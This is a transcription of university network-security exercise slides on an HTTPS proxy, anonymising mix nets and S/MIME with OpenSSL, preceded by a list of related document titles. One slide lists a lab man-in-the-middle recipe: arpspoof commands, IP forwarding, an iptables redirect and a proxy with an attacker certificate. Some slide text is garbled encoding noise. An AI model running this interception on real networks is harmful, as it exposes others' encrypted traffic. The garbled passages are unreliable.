NetSec Exercise 8 Communication Mixes

Similar documents
Electronic mail security. MHS (Message Handling System)

METU Department of Computer Engineering

4.1: Securing Applications Remote Login: Secure Shell (SSH) PEM/PGP. Chapter 5: Security Concepts for Networks

Linux Squid Proxy Server

Managing the SSL Certificate for the ESRS HTTPS Listener Service Technical Notes P/N REV A01 January 14, 2011

OpenSSL. Version January 28, 2010

Prof. Sead Muftic Feng Zhang. Lecture 10: Secure Systems

StreamServe Persuasion SP5 Encryption and Authentication

avast! for linux technical documentation

Netzwerksicherheit Übung 6 SSL/TLS, OpenSSL

Michal Ludvig, SUSE Labs, 01/30/2004, Secure networking, 1

Grid Computing - X.509

openssl egg Bindings to the OpenSSL SSL/TLS library Extension for Chicken Scheme Version Thomas Chust

F-Secure Internet Gatekeeper

StreamServe Persuasion SP4 Encryption and Authentication

Avast for linux technical documentation

Lecture 10: 1. Secure E mail E systems. Systems. Page 1

StreamServe Encryption and Authentication

Firewall Piercing. Alon Altman Haifa Linux Club

Linux firewall. Need of firewall Single connection between network Allows restricted traffic between networks Denies un authorized users

OpenSSL: Secure Communication

Load Balancing Trend Micro InterScan Web Gateway

Bypassing CAPTCHAs by Impersonating CAPTCHA Providers

TLS/SSL in distributed systems. Eugen Babinciuc

Clearswift Information Governance

CPSC Network Programming. , FTP, and NAT.

Internet Technology 2/13/2013

Jackal clone SSL certificates. Kevin Sheldrake rtfc.org.uk

Network Security. Routing and Firewalls. Radboud University Nijmegen, The Netherlands. Autumn 2014

Angels (OpenSSL) and D(a)emons. Athula Balachandran Wolfgang Richter

Network Security - Secure upper layer protocols - Background. Security. Question from last lecture: What s a birthday attack? Dr.

Lab Objectives & Turn In

Focus on Security. Keeping the bad guys out

Smoothwall Web Filter Deployment Guide

Bypassing firewalls Another hole in the wall ;-) Présentation pour «La nuit du hack» le 13 Juin 2009

Owner of the content within this article is Written by Marc Grote

Lab Exercise SSL/TLS. Objective. Step 1: Open a Trace. Step 2: Inspect the Trace

Assignment 3 Firewalls

Linux Administrator (Advance)

Firewall. IPTables and its use in a realistic scenario. José Bateira ei10133 Pedro Cunha ei05064 Pedro Grilo ei09137 FEUP MIEIC SSIN

Generating and Installing SSL Certificates on the Cisco ISA500

SBClient SSL. Ehab AbuShmais

Early Recognition of Encrypted Applications

Load Balancing VMware Horizon View. Deployment Guide

Bypassing CAPTCHAs by Impersonating CAPTCHA Providers

DEPLOYMENT GUIDE Version 1.2. Deploying the BIG-IP System v9.x with Microsoft IIS 7.0 and 7.5

Network security Exercise 9 How to build a wall of fire Linux Netfilter

1. The Web: HTTP; file transfer: FTP; remote login: Telnet; Network News: NNTP; SMTP.

Linux Networking: IP Packet Filter Firewalling

SolarWinds Technical Reference

Load Balancing Bloxx Web Filter. Deployment Guide

Testing Work Group. Document Status: Project: WS-I Monitor Tool Functional Specification [MonitorSpecification.doc]

Firewalls. Chien-Chung Shen

Load Balancing VMware Horizon View. Deployment Guide

login timeout 30 access list ALL line 20 extended permit ip any any port 9053 interval 15 passdetect interval 30

Load Balancing McAfee Web Gateway. Deployment Guide

File Transfer Examples. Running commands on other computers and transferring files between computers

. Daniel Zappala. CS 460 Computer Networking Brigham Young University

ipchains and iptables for Firewalling and Routing

Technical specification

Project #2: Secure System Due: Tues, November 29 th in class

ENABLING RPC OVER HTTPS CONNECTIONS TO M-FILES SERVER

COMP 112 Assignment 1: HTTP Servers

SSL VPN connection multiplexing techniques

PowerChute TM Network Shutdown Security Features & Deployment

Electronic Mail

DEPLOYMENT GUIDE DEPLOYING THE BIG-IP SYSTEM WITH MICROSOFT INTERNET INFORMATION SERVICES (IIS) 7.0

Integrated SSL Scanning

EE 7376: Introduction to Computer Networks. Homework #3: Network Security, , Web, DNS, and Network Management. Maximum Points: 60

HTTP Reverse Proxy Scenarios

Internet Programming. Security

1 Introduction: Network Applications

Load Balancing Clearswift Secure Web Gateway

Internet Technologies. World Wide Web (WWW) Proxy Server Network Address Translator (NAT)

THE HONG KONG POLYTECHNIC UNIVERSITY Department of Electronic and Information Engineering

PUBLIC Connecting a Customer System to SAP HCI

How to Create, Setup, and Configure an Ubuntu Router with a Transparent Proxy.

Web Application Firewall

infilename outfilename signcert privkey headers flags

Chapter 32 Internet Security

StreamServe Persuasion SP4 Service Broker

This works very well for situations where all computers are within the same LAN and can access both the SQL server and the network shares.

Rapid Access Cloud: Se1ng up a Proxy Host

Vertigo's Running Dedicated Server HOWTO (v1.2)

Netfilter. GNU/Linux Kernel version 2.4+ Setting up firewall to allow NIS and NFS traffic. January 2008

Load Balancing Sophos Web Gateway. Deployment Guide

Device Log Export ENGLISH

Redirecting and modifying SMTP mail with TLS session renegotiation attacks

Configure Managed File Transfer Endpoints

CS 772. Network Security: Concepts, Protocols and Programming Fall 2008 Final Exam Time 2 & 1/2 hours Open Book & Notes.

Evolution of the WWW. Communication in the WWW. WWW, HTML, URL and HTTP. HTTP Abstract Message Format. The Client/Server model is used:

The IceWarp SSL Certificate Process

How To Set Up A Network Map In Linux On A Ubuntu 2.5 (Amd64) On A Raspberry Mobi) On An Ubuntu (Amd66) On Ubuntu 4.5 On A Windows Box

Linux Firewall Wizardry. By Nemus

Scan Report Executive Summary. Part 2. Component Compliance Summary IP Address :

IceWarp SSL Certificate Process

Transcription:

NetSec Exercise 8 Communication Mixes Thomas Schneider Computer Networks and Communication Systems Dept. of Computer Sciences, University of Erlangen-Nuremberg, Germany 8. 11.1.2008 Thomas Schneider: NetSec Exercise 8 Communication Mixes 1 / 22

Exercise HTTPS Proxy (wproxy) wproxy = wserver + wclient: 1 incoming SSL connection from client: initialize_ctx(proxykey,proxycert), tcp_listen, while(1): accept, fork, SSL_accept 2 new SSL connection to server: initialize_ctx, tcp_connect, SSL_connect 3 read GET request from client, to stdout and server: while(1): BIO_gets(client buf), fwrite(buf stdout), SSL_write(buf server), blank line break 4 read HTTP response from server, to stdout and client: while(1): SSL_read(server buf), if(ssl_get_error()==ssl_error_zero_return) break, fwrite(buf stdout), SSL_write(buf client) 5 shutdown SSL and TCP connections for client and server: SSL_shutdown, close Thomas Schneider: NetSec Exercise 8 Communication Mixes 2 / 22

Practical Attack: ARP-Spoofing + HTTPS Proxy Client Server wclient -h proxyip -p 4444 -v wserver SSL Proxy (Attacker) SSL IP: serverip Port: 4433 IP: proxyip Port: 4444 Exercise 7, 5f: wproxy -p 4444 -i serverip -c attackcert.pem arpspoof -i eth1 -t <IP_Client> <IP_Server> arpspoof -i eth1 -t <IP_Server> <IP_Client> ssh -Y <host> ssh -Y <host> ssh -Y <host> echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -i eth1 \ -p tcp --dport 4433 -j REDIRECT \ --to-port 4433 wproxy -p 4433 -i <IP_Server> \ -c attackcert.pem Port 14 192.168.10X.1 192.168.10X.2 192.168.10X.254 Port 2 Port 19 VLAN 400X Thomas Schneider: NetSec Exercise 8 Communication Mixes 4 / 22

3455678&9$847)58:#;!!"##$%&'()&"%*#&+,-.! <=#)&47&#>$)?9;)87@#7$#A)87)0B/0)CD)E2)3=965 F4G)67$G9&#9CH#)#598H) &455678&9$847! I)#&+ =8A#;)$=#)&455678&9$847)G#H9$847;)C#$?##7);#7A#G;)97A)G#&#8@#G;J " K$)C6FF#G;)87&4587L)5#;;9L#;)?=8&=)9G#)9;D55#$G8&9HHD)#7&GD>$#A);4) $=9$)47HD)$=#)58:)&97)A#&GD>$)$=#5 " K$)&=97L#;)$=#)M9>>#9G97&#N)4F)5#;;9L#;)CD)A#&GD>$87L)$=#5 " K$)&=97L#;)$=#)4GA#G)4F)5#;;9L#;)97A)G#H9D;)$=#5)87)C9$&=#;) " O4?#@#G()8F)$=#)58:)8;)&45>G458;#A)97)9$$9&P#G)&97)H#9G7)M#@#GD$=87LN! %#&6G8$D)&97)C#)87&G#9;#A)CD)&9;&9A87L)58:#;! Q:95>H#J)I);#7A;)9)5#;;9L#)5)$4)R)@89)$?4)58:#;)S0)97A)S+ " I! S0J TG 0 (TG + ()TG 1 ()5U VWR U VWS+ U VWS0 " S0! S+J TG + ()TG 1 ()5U VWR U VWS+ " S+! RJ TG 1 ()5U VWR " K$)8;)85>4G$97$()$=9$)$=#)58:#;)>G4&#;;)M#746L=N)5#;;9L#;!"#$%#&'()*%)+,,-.+,,/ 012/ Thomas Schneider: NetSec Exercise 8 Communication Mixes 5 / 22

4566789&:$958)69;#< =0()B=1()B=?()B=+()B=>()BA#<$()B=#<<:C#D EFA D EF=> D EF=+ D EF=? D EF=1 D EF=0 %57@&# =0 =? =1 =+ => A#<$!"#$%#&'()*%)+,,-.+,,/ 0123 Thomas Schneider: NetSec Exercise 8 Communication Mixes 6 / 22

Exercise MixNet Implement mixnode and mixclient for a mix net OpenSSL for digital signatures and asymmetric encryption Messages encoded with S/MIME To: header contains hostname of next mix. Mixes are connected via plain TCP/IP port 4444 (no SSL) Use private key (groupkey.pem) and certificate (groupcert.pem) of your group certificates for decrypting messages sent to your mixnode Thomas Schneider: NetSec Exercise 8 Communication Mixes 7 / 22

S/MIME (Secure/Multipurpose Internet Mail Extens.) Standard for public key encryption and signing of messages (email) MIME defines how the body of a mail is structured S/MIME signs/encrypts body of messages (not header) S/MIME encrypted message body format MIME-Version: 1.0 Content-Disposition: attachment; filename="smime.p7m" Content-Type: application/x-pkcs7-mime; smime-type=\ enveloped-data; name="smime.p7m" Content-Transfer-Encoding: base64 MIIJMgYJKoZIhvcNAQcDoIIJIzC... Thomas Schneider: NetSec Exercise 8 Communication Mixes 9 / 22

S/MIME signed message body format MIME-Version: 1.0 Content-Type: multipart/signed; protocol=\ "application/x-pkcs7-signature"; micalg=sha1; \ boundary="----92b858ac09e7231793cc2e727df4db73" This is an S/MIME signed message ------92B858AC09E7231793CC2E727DF4DB73 Message Text ------92B858AC09E7231793CC2E727DF4DB73 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" MIINbAYJKoZIhvcNAQcCoI... ------92B858AC09E7231793CC2E727DF4DB73-- Thomas Schneider: NetSec Exercise 8 Communication Mixes 11 / 22

S/MIME with OpenSSL S/MIME support in OpenSSL (man smime): Sign: openssl smime -sign -in message.txt \ -inkey signkey.pem -signer signcert.pem \ > signed_message.txt Encrypt: openssl smime -encrypt -aes128 \ -in message.txt -to hostname_of_receiver \ receivercert.pem > encrypted_message.txt Sign+Encrypt: First sign, then encrypt openssl smime -sign... \ openssl smime -encrypt... \ (no -in parameter) > sign_enc_message.txt Thomas Schneider: NetSec Exercise 8 Communication Mixes 13 / 22

Prepare Mix message Prepare message m to be sent from A to B via M1 and M2: openssl smime -sign -in m.txt \ -inkey Akey.pem -signer Acert.pem \ openssl smime -encrypt -aes128 \ -to B_hostname Bcert.pem \ openssl smime -encrypt -aes128 \ -to M2_hostname M2cert.pem \ openssl smime -encrypt -aes128 \ -to M1_hostname M1cert.pem \ > mix_message.txt cat mix_message.txt To: M1_hostname MIME-Version: 1.0... Thomas Schneider: NetSec Exercise 8 Communication Mixes 15 / 22

Mixclient mixclient reads mixed message from stdin and delivers it to the first hostname (To:...) via TCP/IP port 4444: A>./mixclient < mix_message.txt Delivering message to M1_hostname Thomas Schneider: NetSec Exercise 8 Communication Mixes 17 / 22

Mixnode mixnode receives messages on TCP/IP port 4444, decrypts them with its groupkey.pem and groupcert.pem. Afterwards it checks, if another To:... is given in the decrypted message: YES, To: given: Deliver decrypted message to next mix given after To: via TCP/IP port 4444 M1>./mixnode Enter PEM pass phrase: Listening for incoming connections. --- Starting to process message from IP_A... Decrypting message... Delivering message to HOSTNAME_M2 Message processed. Thomas Schneider: NetSec Exercise 8 Communication Mixes 19 / 22

NO To: : Check if signature of sender is OK (certificate path to NetSecCA rootcert.pem) and output message B>./mixnode Enter PEM pass phrase: Listening for incoming connections. --- Starting to process message from IP_M3... Decrypting message... Verifying signature... Message from /C=DE/ST=Bavaria/L=Erlangen/O=FAU /OU=CS 7 / NetSec/CN=NetSec CA/emailAddress=... --- Message Text... --- Message processed. Thomas Schneider: NetSec Exercise 8 Communication Mixes 21 / 22

OpenSSL Coding Hints Load private key from file: PEM_read_PrivateKey Load X509 certificate from file: PEM_read_X509 Load root certificate from file: X509_STORE_new, X509_STORE_set_verify_cb_func(store,NULL), X509_STORE_add_lookup(store,X509_LOOKUP_file()), X509_LOOKUP_load_file(lookup, rootcert.pem,...) Show IP address of TCP connection: accept, inet_ntop Decrypt message: BIO_new_mem_buf, SMIME_read_PKCS7, bio_decrypted=bio_new(bio_s_mem()), PKCS7_decrypt Deliver to next mix ( To: ): BIO_gets, BIO_get_mem_data Check signature and show message (No To: ): SMIME_read_PKCS7, PKCS7_verify, PKCS7_get0_signers, sk_x509_value, X509_NAME_oneline Thomas Schneider: NetSec Exercise 8 Communication Mixes 22 / 22

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information